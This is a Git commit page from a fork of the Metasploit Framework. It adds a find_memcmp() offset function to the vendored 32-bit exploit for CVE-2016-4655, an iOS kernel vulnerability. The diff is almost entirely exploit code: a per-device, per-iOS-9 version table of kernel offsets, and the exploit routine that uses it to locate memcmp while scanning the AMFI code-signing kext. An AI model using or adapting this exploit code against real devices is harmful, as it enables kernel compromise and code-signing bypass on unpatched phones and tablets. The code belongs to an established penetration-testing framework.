dnrops
/
metasploit-framework
1
0
Fork 0
Code Issues Pull Requests Packages Projects Releases Wiki Activity

add find_memcmp() offset function

This commit is contained in:
Tim W 2018-10-21 21:17:00 +08:00
parent ccd56dd1b1
commit 853f9c3701
2 changed files with 141 additions and 3 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

4
external/source/exploits/CVE-2016-4655/exploit32.c vendored
View File

@ -1263,9 +1263,7 @@ void init_exploit(void * dlsym_addr, void * dlopen_addr)
amfi_macho = (void*)((uint32_t)amfi_macho - 0x1000);
}
/*r2 -q kcache/kernelcache.bin -c "is" 2>&1 | grep _memcmp*/
/*3588 0x000c3c80 0x800c4c80 GLOBAL FUNC 0 _memcmp*/
uint32_t memcmp_what = kernel_start + 0xc3c81 + 1;
uint32_t memcmp_what = kernel_start + find_memcmp();
debug_print("memcmp_what %p\n", (void*)(memcmp_what));
uint32_t amfi_memcmp_off;
for (amfi_memcmp_off = amfi_macho_start; amfi_memcmp_off < kernel_size; amfi_memcmp_off += 4) {

140
external/source/exploits/CVE-2016-4655/offsets32.c vendored
View File

@ -2806,3 +2806,143 @@ static inline unsigned int find_mac_proc_check(void) {
}
}
/*r2 -q kcache/kernelcache.bin -c "is" | grep memcmp*/
/*3588 0x000c3c80 0x800c4c80 GLOBAL FUNC 0 _memcmp*/
static inline unsigned int find_memcmp(void) {
switch (target_environment) {
case iPhone41_iOS902: return 0xc3c80;
case iPhone41_iOS910: return 0xc3c80;
case iPhone41_iOS920: return 0xc3c80;
case iPhone41_iOS921: return 0xc3c80;
case iPhone41_iOS930: return 0xc3c80;
case iPhone41_iOS931: return 0xc3c80;
case iPhone41_iOS932: return 0xc3c80;
case iPhone41_iOS933: return 0xc3c80;
case iPhone41_iOS934: return 0xc3c80;
case iPhone51_iOS910: return 0xc3c80;
case iPhone51_iOS920: return 0xc3c80;
case iPhone51_iOS921: return 0xc3c80;
case iPhone51_iOS930: return 0xc3c80;
case iPhone51_iOS931: return 0xc3c80;
case iPhone51_iOS932: return 0xc3c80;
case iPhone51_iOS933: return 0xc3c80;
case iPhone51_iOS934: return 0xc3c80;
case iPhone52_iOS902: return 0xc3c80;
case iPhone52_iOS910: return 0xc3c80;
case iPhone52_iOS920: return 0xc3c80;
case iPhone52_iOS921: return 0xc3c80;
case iPhone52_iOS930: return 0xc3c80;
case iPhone52_iOS931: return 0xc3c80;
case iPhone52_iOS932: return 0xc3c80;
case iPhone52_iOS933: return 0xc3c80;
case iPhone52_iOS934: return 0xc3c80;
case iPhone53_iOS910: return 0xc3c80;
case iPhone53_iOS920: return 0xc3c80;
case iPhone53_iOS921: return 0xc3c80;
case iPhone53_iOS930: return 0xc3c80;
case iPhone53_iOS931: return 0xc3c80;
case iPhone53_iOS932: return 0xc3c80;
case iPhone53_iOS933: return 0xc3c80;
case iPhone53_iOS934: return 0xc3c80;
case iPhone54_iOS910: return 0xc3c80;
case iPhone54_iOS920: return 0xc3c80;
case iPhone54_iOS921: return 0xc3c80;
case iPhone54_iOS930: return 0xc3c80;
case iPhone54_iOS931: return 0xc3c80;
case iPhone54_iOS932: return 0xc3c80;
case iPhone54_iOS933: return 0xc3c80;
case iPhone54_iOS934: return 0xc3c80;
case iPad21_iOS910: return 0xc3c80;
case iPad21_iOS920: return 0xc3c80;
case iPad21_iOS921: return 0xc3c80;
case iPad21_iOS930: return 0xc3c80;
case iPad21_iOS931: return 0xc3c80;
case iPad21_iOS932: return 0xc3c80;
case iPad21_iOS933: return 0xc3c80;
case iPad21_iOS934: return 0xc3c80;
case iPad22_iOS910: return 0xc3c80;
case iPad22_iOS920: return 0xc3c80;
case iPad22_iOS921: return 0xc3c80;
case iPad22_iOS930: return 0xc3c80;
case iPad22_iOS931: return 0xc3c80;
case iPad22_iOS932: return 0xc3c80;
case iPad22_iOS933: return 0xc3c80;
case iPad22_iOS934: return 0xc3c80;
case iPad23_iOS910: return 0xc3c80;
case iPad23_iOS920: return 0xc3c80;
case iPad23_iOS921: return 0xc3c80;
case iPad23_iOS930: return 0xc3c80;
case iPad23_iOS931: return 0xc3c80;
case iPad23_iOS932: return 0xc3c80;
case iPad23_iOS933: return 0xc3c80;
case iPad23_iOS934: return 0xc3c80;
case iPad24_iOS910: return 0xc3c80;
case iPad24_iOS920: return 0xc3c80;
case iPad24_iOS921: return 0xc3c80;
case iPad24_iOS930: return 0xc3c80;
case iPad24_iOS931: return 0xc3c80;
case iPad24_iOS932: return 0xc3c80;
case iPad24_iOS933: return 0xc3c80;
case iPad24_iOS934: return 0xc3c80;
case iPad25_iOS902: return 0xc3c80;
case iPad31_iOS910: return 0xc3c80;
case iPad31_iOS920: return 0xc3c80;
case iPad31_iOS921: return 0xc3c80;
case iPad31_iOS930: return 0xc3c80;
case iPad31_iOS931: return 0xc3c80;
case iPad31_iOS932: return 0xc3c80;
case iPad31_iOS933: return 0xc3c80;
case iPad31_iOS934: return 0xc3c80;
case iPad32_iOS910: return 0xc3c80;
case iPad32_iOS920: return 0xc3c80;
case iPad32_iOS921: return 0xc3c80;
case iPad32_iOS930: return 0xc3c80;
case iPad32_iOS931: return 0xc3c80;
case iPad32_iOS932: return 0xc3c80;
case iPad32_iOS933: return 0xc3c80;
case iPad32_iOS934: return 0xc3c80;
case iPad33_iOS902: return 0xc3c80;
case iPad33_iOS910: return 0xc3c80;
case iPad33_iOS920: return 0xc3c80;
case iPad33_iOS921: return 0xc3c80;
case iPad33_iOS930: return 0xc3c80;
case iPad33_iOS931: return 0xc3c80;
case iPad33_iOS932: return 0xc3c80;
case iPad33_iOS933: return 0xc3c80;
case iPad33_iOS934: return 0xc3c80;
case iPad34_iOS910: return 0xc3c80;
case iPad34_iOS920: return 0xc3c80;
case iPad34_iOS921: return 0xc3c80;
case iPad34_iOS930: return 0xc3c80;
case iPad34_iOS931: return 0xc3c80;
case iPad34_iOS932: return 0xc3c80;
case iPad34_iOS933: return 0xc3c80;
case iPad34_iOS934: return 0xc3c80;
case iPad35_iOS910: return 0xc3c80;
case iPad35_iOS920: return 0xc3c80;
case iPad35_iOS921: return 0xc3c80;
case iPad35_iOS930: return 0xc3c80;
case iPad35_iOS931: return 0xc3c80;
case iPad35_iOS932: return 0xc3c80;
case iPad35_iOS933: return 0xc3c80;
case iPad35_iOS934: return 0xc3c80;
case iPad36_iOS910: return 0xc3c80;
case iPad36_iOS920: return 0xc3c80;
case iPad36_iOS921: return 0xc3c80;
case iPad36_iOS930: return 0xc3c80;
case iPad36_iOS931: return 0xc3c80;
case iPad36_iOS932: return 0xc3c80;
case iPad36_iOS933: return 0xc3c80;
case iPad36_iOS934: return 0xc3c80;
case iPod51_iOS910: return 0xc3c80;
case iPod51_iOS920: return 0xc3c80;
case iPod51_iOS921: return 0xc3c80;
case iPod51_iOS930: return 0xc3c80;
case iPod51_iOS931: return 0xc3c80;
case iPod51_iOS932: return 0xc3c80;
case iPod51_iOS933: return 0xc3c80;
case iPod51_iOS934: return 0xc3c80;
default: return 0;
}
}